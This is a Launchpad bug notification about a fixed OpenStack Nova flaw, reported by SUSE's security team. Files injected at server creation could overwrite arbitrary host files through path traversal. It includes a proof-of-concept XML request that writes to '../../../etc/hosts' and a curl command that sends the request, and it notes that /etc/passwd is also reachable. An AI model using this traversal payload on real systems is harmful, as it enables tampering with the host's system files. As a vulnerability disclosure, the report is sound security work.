** No longer affects: nova/diablo -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1015531
Title: Remote arbitrary file corruption / creation flaw via injected files Status in OpenStack Compute (Nova): Fix Released Status in OpenStack Compute (nova) essex series: Fix Released Status in “nova” package in Ubuntu: Fix Released Status in “nova” source package in Precise: Fix Released Bug description: Matthias Weckbecker from SUSE Security Team reported the following: ------------------ During our internal security audit efforts at SUSE for openstack, I have found an issue in openstack-nova (compute). Quoting from [1] (comment #1): Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py: [... snipped copy of utils.execute code ...] It's already doing lots of things correctly, like e.g. calling Popen with the first parameter being a list, still it is affected by traversal flaws. Testcase (also from [1], comment #0): mweckbecker@s3gfault:~$ cat newserver.xml <?xml version="1.0" encoding="UTF-8"?> <server xmlns="http://docs.openstack.org/compute/api/v1.1"; imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"; flavorRef="6" name="new-server-test"> <metadata> <meta key="My Server Name">foobar</meta> </metadata> <personality> <file path="../../../../../../../../../../../../../etc/hosts"> ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6 b25zLiINCg0KLVJpY2hhcmQgQmFjaA== </file> </personality> </server> mweckbecker@s3gfault:~$ curl -v "http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers"; -H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15" -H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml Additional note: This beast is calling tee with sudo, potentially allowing attackers to even alter files such as /etc/passwd. [1] https://bugzilla.novell.com/show_bug.cgi?id=767687 Thanks, Matthias To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1015531/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : [email protected] Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
